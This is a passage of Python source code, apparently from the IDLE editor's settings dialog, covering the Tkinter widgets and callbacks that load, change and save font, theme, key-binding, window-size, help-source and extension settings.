text=' Additional Help Sources ')
#frame_run
startup_title = Label(frame_run, text='At Startup')
self.radio_startup_edit = Radiobutton(
frame_run, variable=self.startup_edit, value=1,
text="Open Edit Window")
self.radio_startup_shell = Radiobutton(
frame_run, variable=self.startup_edit, value=0,
text='Open Shell Window')
#frame_save
run_save_title = Label(frame_save, text='At Start of Run (F5) ')
self.radio_save_ask = Radiobutton(
frame_save, variable=self.autosave, value=0,
text="Prompt to Save")
self.radio_save_auto = Radiobutton(
frame_save, variable=self.autosave, value=1,
text='No Prompt')
#frame_win_size
win_size_title = Label(
frame_win_size, text='Initial Window Size (in characters)')
win_width_title = Label(frame_win_size, text='Width')
self.entry_win_width = Entry(
frame_win_size, textvariable=self.win_width, width=3)
win_height_title = Label(frame_win_size, text='Height')
self.entry_win_height = Entry(
frame_win_size, textvariable=self.win_height, width=3)
#frame_help
frame_helplist = Frame(frame_help)
frame_helplist_buttons = Frame(frame_helplist)
scroll_helplist = Scrollbar(frame_helplist)
self.list_help = Listbox(
frame_helplist, height=5, takefocus=FALSE,
exportselection=FALSE)
scroll_helplist.config(command=self.list_help.yview)
self.list_help.config(yscrollcommand=scroll_helplist.set)
self.list_help.bind('<ButtonRelease-1>', self.help_source_selected)
self.button_helplist_edit = Button(
frame_helplist_buttons, text='Edit', state=DISABLED,
width=8, command=self.helplist_item_edit)
self.button_helplist_add = Button(
frame_helplist_buttons, text='Add',
width=8, command=self.helplist_item_add)
self.button_helplist_remove = Button(
frame_helplist_buttons, text='Remove', state=DISABLED,
width=8, command=self.helplist_item_remove)
#widget packing
#body
frame_run.pack(side=TOP, padx=5, pady=5, fill=X)
frame_save.pack(side=TOP, padx=5, pady=5, fill=X)
frame_win_size.pack(side=TOP, padx=5, pady=5, fill=X)
frame_help.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
#frame_run
startup_title.pack(side=LEFT, anchor=W, padx=5, pady=5)
self.radio_startup_shell.pack(side=RIGHT, anchor=W, padx=5, pady=5)
self.radio_startup_edit.pack(side=RIGHT, anchor=W, padx=5, pady=5)
#frame_save
run_save_title.pack(side=LEFT, anchor=W, padx=5, pady=5)
self.radio_save_auto.pack(side=RIGHT, anchor=W, padx=5, pady=5)
self.radio_save_ask.pack(side=RIGHT, anchor=W, padx=5, pady=5)
#frame_win_size
win_size_title.pack(side=LEFT, anchor=W, padx=5, pady=5)
self.entry_win_height.pack(side=RIGHT, anchor=E, padx=10, pady=5)
win_height_title.pack(side=RIGHT, anchor=E, pady=5)
self.entry_win_width.pack(side=RIGHT, anchor=E, padx=10, pady=5)
win_width_title.pack(side=RIGHT, anchor=E, pady=5)
#frame_help
frame_helplist_buttons.pack(side=RIGHT, padx=5, pady=5, fill=Y)
frame_helplist.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
scroll_helplist.pack(side=RIGHT, anchor=W, fill=Y)
self.list_help.pack(side=LEFT, anchor=E, expand=TRUE, fill=BOTH)
self.button_helplist_edit.pack(side=TOP, anchor=W, pady=5)
self.button_helplist_add.pack(side=TOP, anchor=W)
self.button_helplist_remove.pack(side=TOP, anchor=W, pady=5)
return frame
def attach_var_callbacks(self):
self.font_size.trace_add('write', self.var_changed_font)
self.font_name.trace_add('write', self.var_changed_font)
self.font_bold.trace_add('write', self.var_changed_font)
self.space_num.trace_add('write', self.var_changed_space_num)
self.colour.trace_add('write', self.var_changed_colour)
self.builtin_theme.trace_add('write', self.var_changed_builtin_theme)
self.custom_theme.trace_add('write', self.var_changed_custom_theme)
self.is_builtin_theme.trace_add('write', self.var_changed_is_builtin_theme)
self.highlight_target.trace_add('write', self.var_changed_highlight_target)
self.keybinding.trace_add('write', self.var_changed_keybinding)
self.builtin_keys.trace_add('write', self.var_changed_builtin_keys)
self.custom_keys.trace_add('write', self.var_changed_custom_keys)
self.are_keys_builtin.trace_add('write', self.var_changed_are_keys_builtin)
self.win_width.trace_add('write', self.var_changed_win_width)
self.win_height.trace_add('write', self.var_changed_win_height)
self.startup_edit.trace_add('write', self.var_changed_startup_edit)
self.autosave.trace_add('write', self.var_changed_autosave)
self.encoding.trace_add('write', self.var_changed_encoding)
def remove_var_callbacks(self):
"Remove callbacks to prevent memory leaks."
for var in (
self.font_size, self.font_name, self.font_bold,
self.space_num, self.colour, self.builtin_theme,
self.custom_theme, self.is_builtin_theme, self.highlight_target,
self.keybinding, self.builtin_keys, self.custom_keys,
self.are_keys_builtin, self.win_width, self.win_height,
self.startup_edit, self.autosave, self.encoding,):
var.trace_remove('write', var.trace_info()[0][1])
def var_changed_font(self, *params):
'''When one font attribute changes, save them all, as they are
not independent from each other. In particular, when we are
overriding the default font, we need to write out everything.
'''
value = self.font_name.get()
self.add_changed_item('main', 'EditorWindow', 'font', value)
value = self.font_size.get()
self.add_changed_item('main', 'EditorWindow', 'font-size', value)
value = self.font_bold.get()
self.add_changed_item('main', 'EditorWindow', 'font-bold', value)
def var_changed_space_num(self, *params):
value = self.space_num.get()
self.add_changed_item('main', 'Indent', 'num-spaces', value)
def var_changed_colour(self, *params):
self.on_new_colour_set()
def var_changed_builtin_theme(self, *params):
old_themes = ('IDLE Classic', 'IDLE New')
value = self.builtin_theme.get()
if value not in old_themes:
if idleConf.GetOption('main', 'Theme', 'name') not in old_themes:
self.add_changed_item('main', 'Theme', 'name', old_themes[0])
self.add_changed_item('main', 'Theme', 'name2', value)
self.new_custom_theme.config(text='New theme, see Help',
fg='#500000')
else:
self.add_changed_item('main', 'Theme', 'name', value)
self.add_changed_item('main', 'Theme', 'name2', '')
self.new_custom_theme.config(text='', fg='black')
self.paint_theme_sample()
def var_changed_custom_theme(self, *params):
value = self.custom_theme.get()
if value != '- no custom themes -':
self.add_changed_item('main', 'Theme', 'name', value)
self.paint_theme_sample()
def var_changed_is_builtin_theme(self, *params):
value = self.is_builtin_theme.get()
self.add_changed_item('main', 'Theme', 'default', value)
if value:
self.var_changed_builtin_theme()
else:
self.var_changed_custom_theme()
def var_changed_highlight_target(self, *params):
self.set_highlight_target()
def var_changed_keybinding(self, *params):
value = self.keybinding.get()
key_set = self.custom_keys.get()
event = self.list_bindings.get(ANCHOR).split()[0]
if idleConf.IsCoreBinding(event):
#this is a core keybinding
self.add_changed_item('keys', key_set, event, value)
else: #this is an extension key binding
ext_name = idleConf.GetExtnNameForEvent(event)
ext_keybind_section = ext_name + '_cfgBindings'
self.add_changed_item('extensions', ext_keybind_section, event, value)
def var_changed_builtin_keys(self, *params):
old_keys = (
'IDLE Classic Windows',
'IDLE Classic Unix',
'IDLE Classic Mac',
'IDLE Classic OSX',
)
value = self.builtin_keys.get()
if value not in old_keys:
if idleConf.GetOption('main', 'Keys', 'name') not in old_keys:
self.add_changed_item('main', 'Keys', 'name', old_keys[0])
self.add_changed_item('main', 'Keys', 'name2', value)
self.new_custom_keys.config(text='New key set, see Help',
fg='#500000')
else:
self.add_changed_item('main', 'Keys', 'name', value)
self.add_changed_item('main', 'Keys', 'name2', '')
self.new_custom_keys.config(text='', fg='black')
self.load_keys_list(value)
def var_changed_custom_keys(self, *params):
value = self.custom_keys.get()
if value != '- no custom keys -':
self.add_changed_item('main', 'Keys', 'name', value)
self.load_keys_list(value)
def var_changed_are_keys_builtin(self, *params):
value = self.are_keys_builtin.get()
self.add_changed_item('main', 'Keys', 'default', value)
if value:
self.var_changed_builtin_keys()
else:
self.var_changed_custom_keys()
def var_changed_win_width(self, *params):
value = self.win_width.get()
self.add_changed_item('main', 'EditorWindow', 'width', value)
def var_changed_win_height(self, *params):
value = self.win_height.get()
self.add_changed_item('main', 'EditorWindow', 'height', value)
def var_changed_startup_edit(self, *params):
value = self.startup_edit.get()
self.add_changed_item('main', 'General', 'editor-on-startup', value)
def var_changed_autosave(self, *params):
value = self.autosave.get()
self.add_changed_item('main', 'General', 'autosave', value)
def var_changed_encoding(self, *params):
value = self.encoding.get()
self.add_changed_item('main', 'EditorWindow', 'encoding', value)
def reset_changed_items(self):
#When any config item is changed in this dialog, an entry
#should be made in the relevant section (config type) of this
#dictionary. The key should be the config file section name and the
#value a dictionary, whose key:value pairs are item=value pairs for
#that config file section.
self.changed_items = {'main':{}, 'highlight':{}, 'keys':{},
'extensions':{}}
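# Example content after a couple of font edits (hypothetical values):
#   {'main': {'EditorWindow': {'font': 'courier', 'font-size': '12'}},
#    'highlight': {}, 'keys': {}, 'extensions': {}}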
def add_changed_item(self, typ, section, item, value):
value = str(value) #make sure we use a string
if section not in self.changed_items[typ]:
self.changed_items[typ][section] = {}
self.changed_items[typ][section][item] = value
def GetDefaultItems(self):
d_items={'main':{}, 'highlight':{}, 'keys':{}, 'extensions':{}}
for config_type in d_items:
sections = idleConf.GetSectionList('default', config_type)
for section in sections:
d_items[config_type][section] = {}
options = idleConf.defaultCfg[config_type].GetOptionList(section)
for option in options:
d_items[config_type][section][option] = (
idleConf.defaultCfg[config_type].Get(section, option))
return d_items
def set_theme_type(self):
if self.is_builtin_theme.get():
self.opt_menu_theme_builtin.config(state=NORMAL)
self.opt_menu_theme_custom.config(state=DISABLED)
self.button_delete_custom_theme.config(state=DISABLED)
else:
self.opt_menu_theme_builtin.config(state=DISABLED)
self.radio_theme_custom.config(state=NORMAL)
self.opt_menu_theme_custom.config(state=NORMAL)
self.button_delete_custom_theme.config(state=NORMAL)
def set_keys_type(self):
if self.are_keys_builtin.get():
self.opt_menu_keys_builtin.config(state=NORMAL)
self.opt_menu_keys_custom.config(state=DISABLED)
self.button_delete_custom_keys.config(state=DISABLED)
else:
self.opt_menu_keys_builtin.config(state=DISABLED)
self.radio_keys_custom.config(state=NORMAL)
self.opt_menu_keys_custom.config(state=NORMAL)
self.button_delete_custom_keys.config(state=NORMAL)
def get_new_keys(self):
list_index = self.list_bindings.index(ANCHOR)
binding = self.list_bindings.get(list_index)
bind_name = binding.split()[0] #first part, up to first space
if self.are_keys_builtin.get():
current_key_set_name = self.builtin_keys.get()
else:
current_key_set_name = self.custom_keys.get()
current_bindings = idleConf.GetCurrentKeySet()
if current_key_set_name in self.changed_items['keys']: #unsaved changes
key_set_changes = self.changed_items['keys'][current_key_set_name]
for event in key_set_changes:
current_bindings[event] = key_set_changes[event].split()
current_key_sequences = list(current_bindings.values())
new_keys = GetKeysDialog(self, 'Get New Keys', bind_name,
current_key_sequences).result
if new_keys: #new keys were specified
if self.are_keys_builtin.get(): #current key set is a built-in
message = ('Your changes will be saved as a new Custom Key Set.'
' Enter a name for your new Custom Key Set below.')
new_keyset = self.get_new_keys_name(message)
if not new_keyset: #user cancelled custom key set creation
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
return
else: #create new custom key set based on previously active key set
self.create_new_key_set(new_keyset)
self.list_bindings.delete(list_index)
self.list_bindings.insert(list_index, bind_name+' - '+new_keys)
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
self.keybinding.set(new_keys)
else:
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
def get_new_keys_name(self, message):
used_names = (idleConf.GetSectionList('user', 'keys') +
idleConf.GetSectionList('default', 'keys'))
new_keyset = SectionName(
self, 'New Custom Key Set', message, used_names).result
return new_keyset
def save_as_new_key_set(self):
new_keys_name = self.get_new_keys_name('New Key Set Name:')
if new_keys_name:
self.create_new_key_set(new_keys_name)
def keybinding_selected(self, event):
self.button_new_keys.config(state=NORMAL)
def create_new_key_set(self, new_key_set_name):
#creates new custom key set based on the previously active key set,
#and makes the new key set active
if self.are_keys_builtin.get():
prev_key_set_name = self.builtin_keys.get()
else:
prev_key_set_name = self.custom_keys.get()
prev_keys = idleConf.GetCoreKeys(prev_key_set_name)
new_keys = {}
for event in prev_keys: #add key set to changed items
event_name = event[2:-2] #trim off the angle brackets
binding = ' '.join(prev_keys[event])
new_keys[event_name] = binding
#handle any unsaved changes to prev key set
if prev_key_set_name in self.changed_items['keys']:
key_set_changes = self.changed_items['keys'][prev_key_set_name]
for event in key_set_changes:
new_keys[event] = key_set_changes[event]
#save the new key set
self.save_new_key_set(new_key_set_name, new_keys)
#change gui over to the new key set
custom_key_list = idleConf.GetSectionList('user', 'keys')
custom_key_list.sort()
self.opt_menu_keys_custom.SetMenu(custom_key_list, new_key_set_name)
self.are_keys_builtin.set(0)
self.set_keys_type()
def load_keys_list(self, keyset_name):
reselect = 0
new_keyset = 0
if self.list_bindings.curselection():
reselect = 1
list_index = self.list_bindings.index(ANCHOR)
keyset = idleConf.GetKeySet(keyset_name)
bind_names = list(keyset.keys())
bind_names.sort()
self.list_bindings.delete(0, END)
for bind_name in bind_names:
key = ' '.join(keyset[bind_name]) #make key(s) into a string
bind_name = bind_name[2:-2] #trim off the angle brackets
if keyset_name in self.changed_items['keys']:
#handle any unsaved changes to this key set
if bind_name in self.changed_items['keys'][keyset_name]:
key = self.changed_items['keys'][keyset_name][bind_name]
self.list_bindings.insert(END, bind_name+' - '+key)
if reselect:
self.list_bindings.see(list_index)
self.list_bindings.select_set(list_index)
self.list_bindings.select_anchor(list_index)
def delete_custom_keys(self):
keyset_name=self.custom_keys.get()
delmsg = 'Are you sure you wish to delete the key set %r ?'
if not tkMessageBox.askyesno(
'Delete Key Set', delmsg % keyset_name, parent=self):
return
self.deactivate_current_config()
#remove key set from config
idleConf.userCfg['keys'].remove_section(keyset_name)
if keyset_name in self.changed_items['keys']:
del(self.changed_items['keys'][keyset_name])
#write changes
idleConf.userCfg['keys'].Save()
#reload user key set list
item_list = idleConf.GetSectionList('user', 'keys')
item_list.sort()
if not item_list:
self.radio_keys_custom.config(state=DISABLED)
self.opt_menu_keys_custom.SetMenu(item_list, '- no custom keys -')
else:
self.opt_menu_keys_custom.SetMenu(item_list, item_list[0])
#revert to default key set
self.are_keys_builtin.set(idleConf.defaultCfg['main']
.Get('Keys', 'default'))
self.builtin_keys.set(idleConf.defaultCfg['main'].Get('Keys', 'name')
or idleConf.default_keys())
#user can't back out of these changes, they must be applied now
self.save_all_changed_configs()
self.activate_config_changes()
self.set_keys_type()
def delete_custom_theme(self):
theme_name = self.custom_theme.get()
delmsg = 'Are you sure you wish to delete the theme %r ?'
if not tkMessageBox.askyesno(
'Delete Theme', delmsg % theme_name, parent=self):
return
self.deactivate_current_config()
#remove theme from config
idleConf.userCfg['highlight'].remove_section(theme_name)
if theme_name in self.changed_items['highlight']:
del(self.changed_items['highlight'][theme_name])
#write changes
idleConf.userCfg['highlight'].Save()
#reload user theme list
item_list = idleConf.GetSectionList('user', 'highlight')
item_list.sort()
if not item_list:
self.radio_theme_custom.config(state=DISABLED)
self.opt_menu_theme_custom.SetMenu(item_list, '- no custom themes -')
else:
self.opt_menu_theme_custom.SetMenu(item_list, item_list[0])
#revert to default theme
self.is_builtin_theme.set(idleConf.defaultCfg['main'].Get('Theme', 'default'))
self.builtin_theme.set(idleConf.defaultCfg['main'].Get('Theme', 'name'))
#user can't back out of these changes, they must be applied now
self.save_all_changed_configs()
self.activate_config_changes()
self.set_theme_type()
def get_colour(self):
target = self.highlight_target.get()
prev_colour = self.frame_colour_set.cget('bg')
rgbTuplet, colour_string = tkColorChooser.askcolor(
parent=self, title='Pick new colour for : '+target,
initialcolor=prev_colour)
if colour_string and (colour_string != prev_colour):
#user didn't cancel, and they chose a new colour
if self.is_builtin_theme.get(): #current theme is a built-in
message = ('Your changes will be saved as a new Custom Theme. '
'Enter a name for your new Custom Theme below.')
new_theme = self.get_new_theme_name(message)
if not new_theme: #user cancelled custom theme creation
return
else: #create new custom theme based on previously active theme
self.create_new_theme(new_theme)
self.colour.set(colour_string)
else: #current theme is user defined
self.colour.set(colour_string)
def on_new_colour_set(self):
new_colour=self.colour.get()
self.frame_colour_set.config(bg=new_colour) #set sample
plane ='foreground' if self.fg_bg_toggle.get() else 'background'
sample_element = self.theme_elements[self.highlight_target.get()][0]
self.text_highlight_sample.tag_config(sample_element, **{plane:new_colour})
theme = self.custom_theme.get()
theme_element = sample_element + '-' + plane
self.add_changed_item('highlight', theme, theme_element, new_colour)
def get_new_theme_name(self, message):
used_names = (idleConf.GetSectionList('user', 'highlight') +
idleConf.GetSectionList('default', 'highlight'))
new_theme = SectionName(
self, 'New Custom Theme', message, used_names).result
return new_theme
def save_as_new_theme(self):
new_theme_name = self.get_new_theme_name('New Theme Name:')
if new_theme_name:
self.create_new_theme(new_theme_name)
def create_new_theme(self, new_theme_name):
#creates new custom theme based on the previously active theme,
#and makes the new theme active
if self.is_builtin_theme.get():
theme_type = 'default'
theme_name = self.builtin_theme.get()
else:
theme_type = 'user'
theme_name = self.custom_theme.get()
new_theme = idleConf.GetThemeDict(theme_type, theme_name)
#apply any of the old theme's unsaved changes to the new theme
if theme_name in self.changed_items['highlight']:
theme_changes = self.changed_items['highlight'][theme_name]
for element in theme_changes:
new_theme[element] = theme_changes[element]
#save the new theme
self.save_new_theme(new_theme_name, new_theme)
#change gui over to the new theme
custom_theme_list = idleConf.GetSectionList('user', 'highlight')
custom_theme_list.sort()
self.opt_menu_theme_custom.SetMenu(custom_theme_list, new_theme_name)
self.is_builtin_theme.set(0)
self.set_theme_type()
def on_list_fonts_button_release(self, event):
font = self.list_fonts.get(ANCHOR)
self.font_name.set(font.lower())
self.set_font_sample()
def set_font_sample(self, event=None):
font_name = self.font_name.get()
font_weight = tkFont.BOLD if self.font_bold.get() else tkFont.NORMAL
new_font = (font_name, self.font_size.get(), font_weight)
self.font_sample.config(font=new_font)
self.text_highlight_sample.configure(font=new_font)
def set_highlight_target(self):
if self.highlight_target.get() == 'Cursor': #bg not possible
self.radio_fg.config(state=DISABLED)
self.radio_bg.config(state=DISABLED)
self.fg_bg_toggle.set(1)
else: #both fg and bg can be set
self.radio_fg.config(state=NORMAL)
self.radio_bg.config(state=NORMAL)
self.fg_bg_toggle.set(1)
self.set_colour_sample()
def set_colour_sample_binding(self, *args):
self.set_colour_sample()
def set_colour_sample(self):
#set the colour sample area
tag = self.theme_elements[self.highlight_target.get()][0]
plane = 'foreground' if self.fg_bg_toggle.get() else 'background'
colour = self.text_highlight_sample.tag_cget(tag, plane)
self.frame_colour_set.config(bg=colour)
def paint_theme_sample(self):
if self.is_builtin_theme.get(): #a default theme
theme = self.builtin_theme.get()
else: #a user theme
theme = self.custom_theme.get()
for element_title in self.theme_elements:
element = self.theme_elements[element_title][0]
colours = idleConf.GetHighlight(theme, element)
if element == 'cursor': #cursor sample needs special painting
colours['background'] = idleConf.GetHighlight(
theme, 'normal', fgBg='bg')
#handle any unsaved changes to this theme
if theme in self.changed_items['highlight']:
theme_dict = self.changed_items['highlight'][theme]
if element + '-foreground' in theme_dict:
colours['foreground'] = theme_dict[element + '-foreground']
if element + '-background' in theme_dict:
colours['background'] = theme_dict[element + '-background']
self.text_highlight_sample.tag_config(element, **colours)
self.set_colour_sample()
def help_source_selected(self, event):
self.set_helplist_button_states()
def set_helplist_button_states(self):
if self.list_help.size() < 1: #no entries in list
self.button_helplist_edit.config(state=DISABLED)
self.button_helplist_remove.config(state=DISABLED)
else: #there are some entries
if self.list_help.curselection(): #there currently is a selection
self.button_helplist_edit.config(state=NORMAL)
self.button_helplist_remove.config(state=NORMAL)
else: #there currently is not a selection
self.button_helplist_edit.config(state=DISABLED)
self.button_helplist_remove.config(state=DISABLED)
def helplist_item_add(self):
help_source = HelpSource(self, 'New Help Source',
).result
if help_source:
self.user_helplist.append((help_source[0], help_source[1]))
self.list_help.insert(END, help_source[0])
self.update_user_help_changed_items()
self.set_helplist_button_states()
def helplist_item_edit(self):
item_index = self.list_help.index(ANCHOR)
help_source = self.user_helplist[item_index]
new_help_source = HelpSource(
self, 'Edit Help Source',
menuitem=help_source[0],
filepath=help_source[1],
).result
if new_help_source and new_help_source != help_source:
self.user_helplist[item_index] = new_help_source
self.list_help.delete(item_index)
self.list_help.insert(item_index, new_help_source[0])
self.update_user_help_changed_items()
self.set_helplist_button_states()
def helplist_item_remove(self):
item_index = self.list_help.index(ANCHOR)
del(self.user_helplist[item_index])
self.list_help.delete(item_index)
self.update_user_help_changed_items()
self.set_helplist_button_states()
def update_user_help_changed_items(self):
"Clear and rebuild the HelpFiles section in self.changed_items"
self.changed_items['main']['HelpFiles'] = {}
for num in range(1, len(self.user_helplist) + 1):
self.add_changed_item(
'main', 'HelpFiles', str(num),
';'.join(self.user_helplist[num-1][:2]))
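# Example result (hypothetical help sources): two list entries produce
#   changed_items['main']['HelpFiles'] == {
#       '1': 'Python Docs;https://docs.python.org/',
#       '2': 'My Notes;/home/me/notes.html'}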
def load_font_cfg(self):
##base editor font selection list
fonts = list(tkFont.families(self))
fonts.sort()
for font in fonts:
self.list_fonts.insert(END, font)
configured_font = idleConf.GetFont(self, 'main', 'EditorWindow')
font_name = configured_font[0].lower()
font_size = configured_font[1]
font_bold = configured_font[2]=='bold'
self.font_name.set(font_name)
lc_fonts = [s.lower() for s in fonts]
try:
current_font_index = lc_fonts.index(font_name)
self.list_fonts.see(current_font_index)
self.list_fonts.select_set(current_font_index)
self.list_fonts.select_anchor(current_font_index)
except ValueError:
pass
##font size dropdown
self.opt_menu_font_size.SetMenu(('7', '8', '9', '10', '11', '12', '13',
'14', '16', '18', '20', '22',
'25', '29', '34', '40'), font_size )
##font_weight
self.font_bold.set(font_bold)
##font sample
self.set_font_sample()
def load_tab_cfg(self):
##indent sizes
space_num = idleConf.GetOption(
'main', 'Indent', 'num-spaces', default=4, type='int')
self.space_num.set(space_num)
def load_theme_cfg(self):
##current theme type radiobutton
self.is_builtin_theme.set(idleConf.GetOption(
'main', 'Theme', 'default', type='bool', default=1))
##currently set theme
current_option = idleConf.CurrentTheme()
##load available theme option menus
if self.is_builtin_theme.get(): #default theme selected
item_list = idleConf.GetSectionList('default', 'highlight')
item_list.sort()
self.opt_menu_theme_builtin.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('user', 'highlight')
item_list.sort()
if not item_list:
self.radio_theme_custom.config(state=DISABLED)
self.custom_theme.set('- no custom themes -')
else:
self.opt_menu_theme_custom.SetMenu(item_list, item_list[0])
else: #user theme selected
item_list = idleConf.GetSectionList('user', 'highlight')
item_list.sort()
self.opt_menu_theme_custom.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('default', 'highlight')
item_list.sort()
self.opt_menu_theme_builtin.SetMenu(item_list, item_list[0])
self.set_theme_type()
##load theme element option menu
theme_names = list(self.theme_elements.keys())
theme_names.sort(key=lambda x: self.theme_elements[x][1])
self.opt_menu_highlight_target.SetMenu(theme_names, theme_names[0])
self.paint_theme_sample()
self.set_highlight_target()
def load_key_cfg(self):
##current keys type radiobutton
self.are_keys_builtin.set(idleConf.GetOption(
'main', 'Keys', 'default', type='bool', default=1))
##currently set keys
current_option = idleConf.CurrentKeys()
##load available keyset option menus
if self.are_keys_builtin.get(): #default theme selected
item_list = idleConf.GetSectionList('default', 'keys')
item_list.sort()
self.opt_menu_keys_builtin.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('user', 'keys')
item_list.sort()
if not item_list:
self.radio_keys_custom.config(state=DISABLED)
self.custom_keys.set('- no custom keys -')
else:
self.opt_menu_keys_custom.SetMenu(item_list, item_list[0])
else: #user key set selected
item_list = idleConf.GetSectionList('user', 'keys')
item_list.sort()
self.opt_menu_keys_custom.SetMenu(item_list, current_option)
item_list = idleConf.GetSectionList('default', 'keys')
item_list.sort()
self.opt_menu_keys_builtin.SetMenu(item_list, idleConf.default_keys())
self.set_keys_type()
##load keyset element list
keyset_name = idleConf.CurrentKeys()
self.load_keys_list(keyset_name)
def load_general_cfg(self):
#startup state
self.startup_edit.set(idleConf.GetOption(
'main', 'General', 'editor-on-startup', default=1, type='bool'))
#autosave state
self.autosave.set(idleConf.GetOption(
'main', 'General', 'autosave', default=0, type='bool'))
#initial window size
self.win_width.set(idleConf.GetOption(
'main', 'EditorWindow', 'width', type='int'))
self.win_height.set(idleConf.GetOption(
'main', 'EditorWindow', 'height', type='int'))
# default source encoding
self.encoding.set(idleConf.GetOption(
'main', 'EditorWindow', 'encoding', default='none'))
# additional help sources
self.user_helplist = idleConf.GetAllExtraHelpSourcesList()
for help_item in self.user_helplist:
self.list_help.insert(END, help_item[0])
self.set_helplist_button_states()
def load_configs(self):
"""
load configuration from default and user config files and populate
the widgets on the config dialog pages.
"""
### fonts / tabs page
self.load_font_cfg()
self.load_tab_cfg()
### highlighting page
self.load_theme_cfg()
### keys page
self.load_key_cfg()
### general page
self.load_general_cfg()
# note: extension page handled separately
def save_new_key_set(self, keyset_name, keyset):
"""
save a newly created core key set.
keyset_name - string, the name of the new key set
keyset - dictionary containing the new key set
"""
if not idleConf.userCfg['keys'].has_section(keyset_name):
idleConf.userCfg['keys'].add_section(keyset_name)
for event in keyset:
value = keyset[event]
idleConf.userCfg['keys'].SetOption(keyset_name, event, value)
def save_new_theme(self, theme_name, theme):
"""
save a newly created theme.
theme_name - string, the name of the new theme
theme - dictionary containing the new theme
"""
if not idleConf.userCfg['highlight'].has_section(theme_name):
idleConf.userCfg['highlight'].add_section(theme_name)
for element in theme:
value = theme[element]
idleConf.userCfg['highlight'].SetOption(theme_name, element, value)
def set_user_value(self, config_type, section, item, value):
if idleConf.defaultCfg[config_type].has_option(section, item):
if idleConf.defaultCfg[config_type].Get(section, item) == value:
#the setting equals a default setting, remove it from user cfg
return idleConf.userCfg[config_type].RemoveOption(section, item)
#if we got here set the option
return idleConf.userCfg[config_type].SetOption(section, item, value)
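# Example (hypothetical values): set_user_value('main', 'EditorWindow',
# 'font', 'courier') removes any user override when 'courier' already
# is the default font, and stores the option in the user config otherwise.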
def save_all_changed_configs(self):
"Save configuration changes to the user config file."
idleConf.userCfg['main'].Save()
for config_type in self.changed_items:
cfg_type_changed = False
for section in self.changed_items[config_type]:
if section == 'HelpFiles':
#this section gets completely replaced
idleConf.userCfg['main'].remove_section('HelpFiles')
cfg_type_changed = True
for item in self.changed_items[config_type][section]:
value = self.changed_items[config_type][section][item]
if self.set_user_value(config_type, section, item, value):
cfg_type_changed = True
if cfg_type_changed:
idleConf.userCfg[config_type].Save()
for config_type in ['keys', 'highlight']:
# save these even if unchanged!
idleConf.userCfg[config_type].Save()
self.reset_changed_items() #clear the changed items dict
self.save_all_changed_extensions() # uses a different mechanism
def deactivate_current_config(self):
#Before a config is saved, some cleanup of current
#config must be done - remove the previous keybindings
win_instances = self.parent.instance_dict.keys()
for instance in win_instances:
instance.RemoveKeybindings()
def activate_config_changes(self):
"Dynamically apply configuration changes"
win_instances = self.parent.instance_dict.keys()
for instance in win_instances:
instance.ResetColorizer()
instance.ResetFont()
instance.set_notabs_indentwidth()
instance.ApplyKeybindings()
instance.reset_help_menu_entries()
def cancel(self):
self.destroy()
def ok(self):
self.apply()
self.destroy()
def apply(self):
self.deactivate_current_config()
self.save_all_changed_configs()
self.activate_config_changes()
def help(self):
page = self.tab_pages._current_page
view_text(self, title='Help for IDLE preferences',
text=help_common+help_pages.get(page, ''))
def create_page_extensions(self):
"""Part of the config dialog used for configuring IDLE extensions.
This code is generic - it works for any and all IDLE extensions.
IDLE extensions save their configuration options using idleConf.
This code reads the current configuration using idleConf, supplies a
GUI interface to change the configuration values, and saves the
changes using idleConf.
Not all changes take effect immediately - some may require restarting IDLE.
This depends on each extension's implementation.
All values are treated as text, and it is up to the user to supply
reasonable values. The only exceptions to this are the 'enable*' options,
which are boolean, and can be toggled with a True/False button.
"""
parent = self.parent
frame = self.tab_pages.pages['Extensions'].frame
self.ext_defaultCfg = idleConf.defaultCfg['extensions']
self.ext_userCfg = idleConf.userCfg['extensions']
self.is_int = self.register(is_int)
self.load_extensions()
# create widgets - a listbox shows all available extensions, with the
# controls for the extension selected in the listbox to the right
self.extension_names = StringVar(self)
frame.rowconfigure(0, weight=1)
frame.columnconfigure(2, weight=1)
self.extension_list = Listbox(frame, listvariable=self.extension_names,
selectmode='browse')
self.extension_list.bind('<<ListboxSelect>>', self.extension_selected)
scroll = Scrollbar(frame, command=self.extension_list.yview)
self.extension_list['yscrollcommand'] = scroll.set
self.details_frame = LabelFrame(frame, width=250, height=250)
self.extension_list.grid(column=0, row=0, sticky='nws')
scroll.grid(column=1, row=0, sticky='ns')
self.details_frame.grid(column=2, row=0, sticky='nsew', padx=[10, 0])
frame.configure(padx=10, pady=10)
self.config_frame = {}
self.current_extension = None
self.outerframe = self # TEMPORARY
self.tabbed_page_set = self.extension_list # TEMPORARY
# create the frame holding controls for each extension
ext_names = ''
for ext_name in sorted(self.extensions):
self.create_extension_frame(ext_name)
ext_names = ext_names + '{' + ext_name + '} '
self.extension_names.set(ext_names)
self.extension_list.selection_set(0)
self.extension_selected(None)
def load_extensions(self):
"Fill self.extensions with data from the default and user configs."
self.extensions = {}
for ext_name in idleConf.GetExtensions(active_only=False):
self.extensions[ext_name] = []
for ext_name in self.extensions:
opt_list = sorted(self.ext_defaultCfg.GetOptionList(ext_name))
# bring 'enable' options to the beginning of the list
enables = [opt_name for opt_name in opt_list
if opt_name.startswith('enable')]
for opt_name in enables:
opt_list.remove(opt_name)
opt_list = enables + opt_list
for opt_name in opt_list:
def_str = self.ext_defaultCfg.Get(
ext_name, opt_name, raw=True)
try:
def_obj = {'True':True, 'False':False}[def_str]
opt_type = 'bool'
except KeyError:
try:
def_obj = int(def_str)
opt_type = 'int'
except ValueError:
def_obj = def_str
opt_type = None
try:
value = self.ext_userCfg.Get(
ext_name, opt_name, type=opt_type, raw=True,
default=def_obj)
except ValueError: # Need this until .Get fixed
value = def_obj # bad values overwritten by entry
var = StringVar(self)
var.set(str(value))
self.extensions[ext_name].append({'name': opt_name,
'type': opt_type,
'default': def_str,
'value': value,
'var': var,
})
def extension_selected(self, event):
newsel = self.extension_list.curselection()
if newsel:
newsel = self.extension_list.get(newsel)
if newsel is None or newsel != self.current_extension:
if self.current_extension:
